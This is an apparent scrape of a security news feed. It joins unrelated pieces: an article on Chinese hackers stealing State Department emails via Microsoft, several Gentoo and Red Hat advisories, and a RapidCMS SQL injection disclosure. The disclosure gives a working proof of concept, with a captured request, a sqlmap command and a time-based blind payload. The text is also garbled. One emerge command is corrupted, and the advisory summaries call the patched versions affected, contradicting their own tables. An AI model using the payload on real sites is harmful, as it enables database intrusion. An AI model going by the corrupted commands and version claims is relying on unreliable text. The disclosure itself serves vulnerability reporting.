Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 22 and Sept. 29. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for September 22 to September 29

By Deeba Ahmed
Chinese hackers have struck again!
This is a post from HackRead.com Read the original post: Chinese Hackers Stole 60,000 US State Department Emails from Microsoft

Thousands of emails belonging to the US State Department were stolen in a data breach targeting Microsoft Outlook accounts.

Chinese hackers are responsible for breaching the security of Microsoft’s cloud-based Exchange email platform, which occurred in May 2023. Apart from stealing tens of thousands of emails from official accounts, the attackers obtained a list of all email accounts belonging to the State Department, Reuters reported.

As reported by Hackread.com, Microsoft revealed the breach in July 2023, explaining that threat actors breached Outlook accounts used by 25 organizations, including the US State and Commerce Departments, and other charges linked to these entities. The tech giant didn’t disclose the names of the impacted organizations and government entities.

The scope of the breach was disclosed at a Senate staff briefing on September 28, 2023. It was revealed at least 60,000 emails belonging to state department officials stationed in the Pacific, East Asia, and Europe were stolen. The compromised accounts mainly belonged to personnel focusing on Indo-Pacific diplomacy.

In a press briefing, State Department’s spokesperson Matthew Miller confirmed the data breach, explaining that “classified systems” weren’t hacked in that incident. Miller also added that the department is yet to make an attribution, but there’s no reason to doubt Microsoft’s attribution.

“Again, this was a hack of Microsoft systems that the State Department uncovered and notified Microsoft about,” Miller told reporters.

On the other hand, Senator Eric Schmitt said in his official statement that there’s a growing need to “harden” security defences against such intrusions in the future. Moreover, Schmitt believes that the federal government’s dependence on a single vendor should also be reviewed as this could be a weak link.

Microsoft has blamed the Chinese cyber-espionage group called Storm-0558 for the email breach. This group is known for infiltrating email systems of its targets to steal sensitive data.

According to a Microsoft representative, Storm-0558 accessed a Windows crash dump and obtained a consumer signing key, which could be used to compromise Exchange Online and Azure Active Directory accounts. The key was obtained by exploiting an already patched zero-day validation flaw that affected the GetAccessTokenForResourceAPI.

By exploiting this flaw, the attackers could create counterfeited signed access tokens and impersonate any account belonging to their target organizations. With this technique, Storm-0558 compromised the corporate account of a Microsoft engineer and managed to access the government email accounts.

Microsoft has revoked the stolen signing key and launched an investigation into the incident. The company has confirmed no further evidence of repeated unauthorized access to customer accounts using the same access token counterfeiting method.

Upon CISA’s insistence, Microsoft agreed to expand access to cloud logging data, which so far was only available to users having Purview Audit (Premium) logging licenses, free of charge so that network defenders can quickly identify breach attempts.

Mike Newman, CEO of My1Login, has commented on this incident, stating that this attack is crucial because hackers accessed sensitive government data from Outlook.

“Attackers appear to have accessed highly sensitive information in this breach by coupling together a number of attack vectors. These are complex and sophisticated techniques that signal Microsoft was facing a determined adversary that was highly motivated to carry out this attack.”

Newman further noted that encryption is the best defence against such incidents, and the workforce shouldn’t be allowed to access user credentials so that they cannot be lost or solved. Moreover, Microsoft shouldn’t have access to consumers’ private keys in the first place. 

“It should be mandatory for security that customer data (i.e. emails, stored credentials, documents) is encrypted using keys that are only known to the customer, meaning they cannot be accessed by the cloud software provider or an external, malicious actor.”

**RELATED ARTICLES**

1.  Chinese Group Storm-0558 Hacked European Govt Emails
2.  Chinese APT Flax Typhoon uses legit tools for cyber espionage
3.  Chinese Hackers Stole Signing Key to Breach Outlook Accounts
4.  Chinese Hackers Using Stolen Ivacy VPN Certificate To Sign Malware
5.  Chinese APT Slid Fake Signal, Telegram Apps onto Official App Stores

Chinese Hackers Stole 60,000 US State Department Emails from Microsoft

Gentoo Linux Security Advisory 202309-14 - Multiple vulnerabilities have been found in libarchive, the worst of which could result in denial of service. Versions greater than or equal to 3.7.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-14  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libarchive: Multiple Vulnerabilities  
     Date: September 29, 2023  
     Bugs: #882521, #911486  
       ID: 202309-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in libarchive, the worst of  
which could result in denial of service.

Background  
=========  
libarchive is a library for manipulating different streaming archive  
formats, including certain tar variants, several cpio formats, and both  
BSD and GNU ar variants.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
app-arch/libarchive  < 3.7.1       >= 3.7.1

Description  
==========  
Multiple vulnerabilities have been discovered in libarchive. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libarchive users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/libarchive-3.7.1"

References  
=========  
[ 1 ] CVE-2022-36227  
      https://nvd.nist.gov/vuln/detail/CVE-2022-36227

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-14

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-14

Gentoo Linux Security Advisory 202309-13 - A buffer overflow vulnerability has been found in GMP which could result in denial of service. Versions greater than or equal to 6.2.1-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: GMP: Buffer Overflow Vulnerability  
     Date: September 29, 2023  
     Bugs: #823804  
       ID: 202309-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A buffer overflow vulnerability has been found in GMP which could result  
in denial of service.

Background  
=========  
The GNU Multiple Precision Arithmetic Library is a library forarbitrary-  
precision arithmetic on different types of numbers.

Affected packages  
================  
Package       Vulnerable    Unaffected  
------------  ------------  ------------  
dev-libs/gmp  < 6.2.1-r2    >= 6.2.1-r2

Description  
==========  
There is an integer overflow leading to a buffer overflow when  
processing untrusted input via GMP's mpz_inp_raw function.

Impact  
=====  
Untrusted input can cause a denial of service via segmentation fault.

Workaround  
=========  
Users can ensure no untrusted input is passed into GMP's mpz_inp_raw  
function.

Resolution  
=========  
All GMP users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/gmp-6.2.1-r2"

References  
=========  
[ 1 ] CVE-2021-43618  
      https://nvd.nist.gov/vuln/detail/CVE-2021-43618

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-13

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-13

Gentoo Linux Security Advisory 202309-12 - Multiple vulnerabilities have been found in sudo, the worst of which can result in root privilege escalation. Versions greater than or equal to 1.9.13_p2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: sudo: Multiple Vulnerabilities  
     Date: September 29, 2023  
     Bugs: #898510, #905322  
       ID: 202309-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in sudo, the worst of which can  
result in root privilege escalation.

Background  
=========  
sudo allows a system administrator to give users the ability to run  
commands as other users.

Affected packages  
================  
Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
app-admin/sudo  < 1.9.13_p2   >= 1.9.13_p2

Description  
==========  
Multiple vulnerabilities have been discovered in sudo. Please review the  
CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All sudo users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.9.13_p2"

References  
=========  
[ 1 ] CVE-2023-27320  
      https://nvd.nist.gov/vuln/detail/CVE-2023-27320  
[ 2 ] CVE-2023-28486  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28486  
[ 3 ] CVE-2023-28487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28487

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-12

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-12

Gentoo Linux Security Advisory 202309-11 - Multiple vulnerabilities have been found in libsndfile, the worst of which could result in arbitrary code execution. Versions greater than or equal to 1.1.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libsndfile: Multiple Vulnerabilities  
     Date: September 29, 2023  
     Bugs: #803065  
       ID: 202309-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in libsndfile, the worst of  
which could result in arbitrary code execution.

Background  
=========  
libsndfile is a C library for reading and writing files containing  
sampled sound.

Affected packages  
================  
Package                Vulnerable    Unaffected  
---------------------  ------------  ------------  
media-libs/libsndfile  < 1.1.0       >= 1.1.0

Description  
==========  
Multiple vulnerabilities have been discovered in libsndfile. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libsndfile users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libsndfile-1.1.0"

References  
=========  
[ 1 ] CVE-2021-3246  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3246  
[ 2 ] CVE-2021-4156  
      https://nvd.nist.gov/vuln/detail/CVE-2021-4156

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-11

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-11

Gentoo Linux Security Advisory 202309-10 - A vulnerability was discovered in Fish when handling git repository configuration that may lead to execution of arbitrary code Versions greater than or equal to 3.4.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Fish: User-assisted execution of arbitrary code  
     Date: September 29, 2023  
     Bugs: #835337  
       ID: 202309-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability was discovered in Fish when handling git repository  
configuration that may lead to execution of arbitrary code

Background  
=========  
Smart and user-friendly command line shell for macOS, Linux, and the  
rest of the family. It includes features like syntax highlighting,  
autosuggest-as-you-type, and fancy tab completions that just work, with  
no configuration required.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
app-shells/fish  < 3.4.0       >= 3.4.0

Description  
==========  
A vulnerability have been discovered in Fish. Please review the CVE  
identifiers referenced below for details.

Impact  
=====  
A user may be enticed to cd into a git repository under control by an  
attacker (e.g. on a shared filesystem or by unpacking an archive) and  
execute arbitrary commands.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All fish users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-shells/fish-3.4.0"

References  
=========  
[ 1 ] CVE-2022-20001  
      https://nvd.nist.gov/vuln/detail/CVE-2022-20001

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-10

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-10

Gentoo Linux Security Advisory 202309-9 - Multiple vulnerabilities have been found in Pacemaker, the worst of which could result in root privilege escalation. Versions greater than or equal to 2.0.5_rc2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202309-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Pacemaker: Multiple Vulnerabilities  
     Date: September 29, 2023  
     Bugs: #711674, #751430  
       ID: 202309-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been found in Pacemaker, the worst of  
which could result in root privilege escalation.

Background  
=========  
Pacemaker is an Open Source, High Availability resource manager suitable  
for both small and large clusters.

Affected packages  
================  
Package                Vulnerable    Unaffected  
---------------------  ------------  ------------  
sys-cluster/pacemaker  < 2.0.5_rc2   >= 2.0.5_rc2

Description  
==========  
Multiple vulnerabilities have been discovered in Pacemaker. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Pacemaker users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-cluster/pacemaker-2.0.5_rc2"

References  
=========  
[ 1 ] CVE-2018-16877  
      https://nvd.nist.gov/vuln/detail/CVE-2018-16877  
[ 2 ] CVE-2018-16878  
      https://nvd.nist.gov/vuln/detail/CVE-2018-16878  
[ 3 ] CVE-2019-3885  
      https://nvd.nist.gov/vuln/detail/CVE-2019-3885  
[ 4 ] CVE-2020-25654  
      https://nvd.nist.gov/vuln/detail/CVE-2020-25654

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202309-09

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202309-09

Red Hat Security Advisory 2023-5405-01 - The Advanced Virtualization module provides the user-space component for running virtual machines that use KVM in environments managed by Red Hat products. Issues addressed include buffer overflow and code execution vulnerabilities.

Red Hat Security Advisory 2023-5405-01

A vulnerability classified as critical has been found in OpenRapid RapidCMS 1.3.1. This affects an unknown part of the file /resource/addgood.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-240867.

\[Suggested description\]  
RapidCMS Dev.1.3.1 was discovered to contain SQL injection vulnerability in /resource/addgood.php  
\[Vulnerability Type\]  
SQL INJECTION  
\[Vendor of Product\]  
https://github.com/OpenRapid/rapidcms  
\[Affected Product Code Base\]  
RapidCMS Dev.1.3.1  
\[Affected Component\]  
File： /resource/addgood.php  
Parameter： id  
\[Attack Type\]  
Remote  
\[Vulnerability demonstration\]  
1.using hackbar,use post method to access http://localhost:8095/resource/addgood.php,postdata:id=1\*,click execute buuton  

2.  use BurpSuit to capture packets and copy request packet in 175.txt In the directory of sqlmap.

the data in 175.txt:  
POST /resource/addgood.php HTTP/1.1  
Host: localhost:8096  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 58  
Origin: http://localhost:8096  
Connection: close  
Referer: http://localhost:8096/resource/addgood.php  
Cookie: PHPSESSID=su3eg6251ks1n2i43n36fqbn46; admin=Y6W6Rbt6a5W546O0O0O7; user=e4W4h250M9DaA6xa; name=yhy001  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Pragma: no-cache  
Cache-Control: no-cache

**id=1\*****3.run the command python sqlmap.py -r 175.txt --risk=3 --level=5 --current-db  
After the probe is completed, SQL injection vulnerability is found in the id parameter,and the current database name is obtained  
sqlmap resumed the following injection point(s) from stored session:****Parameter: #1\* ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=1" AND (SELECT 1415 FROM (SELECT(SLEEP(5)))IZIr)-- VZWO**

\[Cause of vulnerability\]  
In /resource/addgood.php , the user can control the value of id and the system does not validate the  
validity of the user's input. The attacker can use double quotation marks to splice SQL statements, thus  
causing SQL injection  
\[Repair suggestions\]  
Verify the legitimacy of user input.

Tag

#mac